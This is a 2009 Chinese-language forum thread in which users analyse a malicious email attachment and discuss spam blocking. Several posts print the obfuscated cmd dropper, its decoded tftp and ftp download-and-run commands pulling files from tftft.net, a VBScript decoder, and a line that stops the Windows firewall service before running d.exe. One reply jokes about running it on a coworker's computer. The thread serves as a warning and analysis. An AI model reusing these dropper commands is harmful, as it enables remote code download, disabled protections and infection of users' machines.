Board logo

主題: [其他] [分享]新型態的病毒傳播方式! [打印本頁]
發表人: uason    時間: 2009-11-16 10:21 PM     主題: [分享]新型態的病毒傳播方式!

剛收到的信件附加欓覺得很可疑!

他附加欓很小.
只有1K.
解壓縮後是一個類似捷徑的圖示.
執行指令如下.

CODE:
[Copy to clipboard]
%CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT
也請各位網友多注意這種散播方式!
發表人: Observer    時間: 2009-11-16 10:43 PM

會怎麼樣呢?
發表人: 45326565    時間: 2009-11-16 10:48 PM

*.bat,*.exe,*.html 之類的都最好不要點。

*.bat檔是用指令處理動作的,用左鍵點記事本編輯就能看裡面到底裝三小了

以前用GB雙開或是多重身分執行寫起來超好用,現在都偽裝成騙小孩的木馬跟綁架網頁導向。

記得把收到的信件來址加入黑單內唷
發表人: uason    時間: 2009-11-16 11:27 PM

解出來就是這樣:

CODE:
[Copy to clipboard]
%CoMsPEC% /C ecHo tftP tftft.NEt gEt t F.Vbs>O.BAT
echo StARt f.vBS>>o.BaT
o.bat
o.bat 的內容就會是這樣:

CODE:
[Copy to clipboard]
tftP tftft.NEt gEt t F.Vbs
StARt f.vBS
抓下來的 F.VBs 內容:

CODE:
[Copy to clipboard]
sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k
至於執行後有啥後果?
就要試試才知道了.

以上資料轉自 三秒練功房

[uason 在  2009-11-16 11:46 PM 作了最後編輯]
發表人: watchme    時間: 2009-11-17 10:02 AM

最後那個 VBs 是一次編碼的方式包裝惡意程式,主要目的就是為了躲避防毒防木馬軟體的偵測。陣列中的值各減去 823 之後組成一個新的 Script 給 W.Shell 執行 (0x0D 0x63  ),也許還有另外一層,也許沒有。總之,會這樣畏縮的程式,絕不是好東西。

CODE:
[Copy to clipboard]
cmd /c net stop sharedaccess&echo o tftft.net>n.txt&echo aa33>>n.txt&echo bb33>>n.txt&echo recv d d.exe>>n.txt&echo bye>>n.txt&ftp -s:n.txt&del n.txt&d.exe&attrib ?.vbs -r&del ? ?.exe ?.vbs ?.bat&start http://buy.yahoo.com.tw/
發表人: 老江    時間: 2009-11-17 09:33 PM

蠻有趣的,簡單的說他傳的不是程式
是讓你自己用自己的電腦寫一隻程式出來
vb可以這樣搞喔
我還在想沒有compiler傳這種有用嗎
發表人: qqchien    時間: 2009-11-18 04:52 PM

檔案名稱就告訴你會後悔了!
通常看到這種檔名 就不會去開了吧!

話說 '把收到的信件來址加入黑單內' 真的有用嗎?
通常不是都會換個帳號繼續寄
發表人: LiuRambo    時間: 2009-11-21 08:16 AM


引用:
qqchien寫到:
檔案名稱就告訴你會後悔了!
通常看到這種檔名 就不會去開了吧!

話說 '把收到的信件來址加入黑單內' 真的有用嗎?
通常不是都會換個帳號繼續寄


對啊
現在的垃圾郵件問題在於你的帳號太容易被人家發覺到
一旦被加入到垃圾郵件俱樂部的寄送名單後
怎麼擋都擋不完的........
除非換帳號
發表人: htkstw    時間: 2009-11-21 09:16 AM

關於擋垃圾郵件, 我之前有想過用個人化簽名的方式來擋, 似乎是很有效.
所有寄給我的郵件, 只要它的個人化簽名沒有包含在我允許的特定字串中, 它就會被直接刪除.

只是要我的朋友們都使用這種個人化簽名, 似乎難度很高. 假如朋友們其中有人更改時, 又可能無法立即變更, 會造成收不到郵件. 最後就卡在這個問題無解而作罷.

唉~~還是沒辦法有效擋這些垃圾郵件.
發表人: bear242    時間: 2009-11-22 11:11 AM

找一個看不爽的同事的電腦借開一下就知道了.
發表人: Soup    時間: 2009-11-27 06:26 PM

看了那圖示文字表示他有先警告過你開了會很後悔......
發表人: jimshow2001    時間: 2009-11-28 01:49 AM

現在是看到40k內的檔案都會詢問- -
最近朋友的信箱好像中了奇怪的東西
每次用網頁開啟信箱的時候都會自動下載一的文件XD

..感覺超可怕的--
發表人: sdbb    時間: 2009-11-28 12:17 PM


引用:
老江寫到:
蠻有趣的,簡單的說他傳的不是程式
是讓你自己用自己的電腦寫一隻程式出來
vb可以這樣搞喔
我還在想沒有compiler傳這種有用嗎


vbscript是腳本語言不是vb,只要是win98se以後,就可以直接執行
http://zh.wikipedia.org/wiki/VBScript



歡迎光臨 TWed2k (http://twed2k.org/) Powered by Discuz! 4.1.0